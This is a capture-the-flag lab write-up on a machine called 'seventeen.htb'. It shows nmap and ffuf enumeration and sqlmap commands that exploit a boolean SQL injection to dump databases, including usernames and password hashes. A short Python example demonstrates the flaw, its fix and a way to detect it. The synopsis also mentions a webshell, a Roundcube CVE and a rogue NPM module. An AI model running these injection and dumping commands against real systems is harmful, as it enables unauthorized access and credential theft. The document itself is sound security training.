A hard machine, a hard start
Synopsis
A set of virtual hosts, each adding another step toward the final foothold. One site has a boolean-based SQL injection that gives access to the database, which in turn leaks another virtual host and its database. The old management system offers a file upload and leaks the hostname of a Roundcube webmail instance. Upload a webshell and use CVE-2020-12640 in Roundcube to include and execute it. Password reuse is key at two points before root is obtained by installing a malicious Node module from a rogue NPM server.
Skills Required
- Enumeration
- SQL injection
- Source code review
Skills Learned
- PHP file inclusion
- Npm usage
- Npm registry
Enumeration
$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.165 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -p$ports -sC -sV 10.10.11.165
The Nmap scan shows three open ports: 22 runs SSH, while 80 and 8000 run different versions of Apache. Since we have no SSH credentials yet, we should visit and enumerate ports 80 and 8000 separately.
Apache - Port 8000
![[Pasted image 20220925224118.png]]
Apache - Port 80
A static page; crawling and directory scanning found nothing exploitable. Fuzzing subdomains with ffuf reveals exam.seventeen.htb.
$ ffuf -H 'Host: FUZZ.seventeen.htb' -u 'http://seventeen.htb' -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -fw 2760
________________________________________________
:: Method : GET
:: URL : http://seventeen.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
:: Header : Host: FUZZ.seventeen.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 2760
________________________________________________
exam [Status: 200, Size: 17375, Words: 3222, Lines: 348, Duration: 51ms]
:: Progress: [17770/17770] :: Job [1/1] :: 1879 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
Add it to the local hosts file so the name resolves.
$ echo "10.10.11.165 exam.seventeen.htb" | sudo tee -a /etc/hosts
Use searchsploit to look for known vulnerabilities in exam management systems.
$ searchsploit exam manager system
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) | php/webapps/50103.php
Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) | php/webapps/50111.py
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50726.txt
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection | php/webapps/50725.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
With no credentials, vulnerabilities that need no authentication take priority. Looking at how the SQL injection can be exploited, the exploit file already lists the payload; the injection point is the id parameter.
$ searchsploit -x /php/webapps/50725.txt
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Date: 2022-02-18
<SNIP>
*SQLMAP COMMAND*
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
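As an added illustration (not code from this write-up or from the Exam Reviewer Management System itself): a minimal Python/sqlite3 model of an injectable take_exam lookup, its parameterized fix, and the tautology-versus-contradiction differential check that boolean-based blind detection (as sqlmap performs it) relies on. The exams table and its sample rows are constructed assumptions, not the real erms_db schema.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data; stands in for the application's exam table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE exams (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO exams VALUES (?, ?)",
        [(1, "Midterm"), (2, "Final"), (3, "Quiz")],
    )
    return conn


def take_exam_vulnerable(conn: sqlite3.Connection, exam_id: str) -> list:
    # The pattern behind the finding: the id parameter is pasted into the SQL
    # text, so a trailing "AND 1=2" flips the WHERE clause to false.
    sql = f"SELECT title FROM exams WHERE id = {exam_id}"
    return [row[0] for row in conn.execute(sql)]


def take_exam_fixed(conn: sqlite3.Connection, exam_id: str) -> list:
    # Hardened form: reject anything that is not an integer, then bind it as a
    # query parameter so the value can never become SQL syntax.
    if not exam_id.isdigit():
        return []
    cur = conn.execute("SELECT title FROM exams WHERE id = ?", (int(exam_id),))
    return [row[0] for row in cur]


def boolean_sqli_check(handler, conn: sqlite3.Connection, base_id: str = "1") -> bool:
    # Differential test: if the input is bound, "1 AND 1=1" and "1 AND 1=2" are
    # both invalid ids and must behave identically. If the tautology matches the
    # baseline while the contradiction differs, the handler is injectable.
    base = handler(conn, base_id)
    true_resp = handler(conn, f"{base_id} AND 1=1")
    false_resp = handler(conn, f"{base_id} AND 1=2")
    return true_resp == base and false_resp != base


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_sqli_check(take_exam_vulnerable, db))
    print("fixed handler injectable:", boolean_sqli_check(take_exam_fixed, db))
```

The same check can run in a test suite against a real endpoint by swapping the handler for an HTTP request and comparing response bodies.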
sqlmap
$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch # enumerate database names
<SNIP>
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb
$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms --tables
[3 tables]
+---------+
| user |
| storage |
| student |
+---------+
$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms -T student --threads=10 --dump
Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1 | 1A | Male | 12345 | Smith | 1a40620f9a4ed6cb8d81a1d365559233 | John |
| 2 | 2B | Male | 23347 | Mille | abb635c915b0cc296e071e8d76e9060c | James |
| 3 | 2C | Female | 31234 | Shane | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly |
| 4 | 3C | Female | 43347 | Hales | a1428092eb55781de5eb4fd5e2ceb835 | Jamie |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
The oldmanagement folder in the parent directory (/var/www), visible in the avatar paths of the next dump, suggests another virtual host.
$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D erms_db -T users --threads=10 --dump
Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1 | 1 | ../oldmanagement/files/avatar.png | Admin | fc8ec7b43523e186a27f46957818391c | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2022-02-24 22:00:15 |
| 6 | 2 | ../oldmanagement/files/avatar.png | Anthony | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark | 2021-09-30 16:34:02 | NULL | 2022-05-10 08:21:39 |
| 7 | 2 | ../oldmanagement/files/avatar.png | Smith | 184fe92824bea12486ae9a56050228ee | Stev1992 | Steven | 2022-02-22 21:05:07 | NULL | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
$ echo '10.129.227.143 oldmanagement.seventeen.htb' | sudo tee -a /etc/hosts
This gives a login page that takes a student number plus password; the passwords recovered from the earlier sqlmap dump allow login.
![[Pasted image 20220929163252.png]]
There is a downloadable PDF and a file upload feature. Reading the PDF reveals the virtual host mastermailer.seventeen.htb.
![[Pasted image 20220929163718.png]]
$ echo '10.129.119.55 mastermailer.seventeen.htb' | sudo tee -a /etc/hosts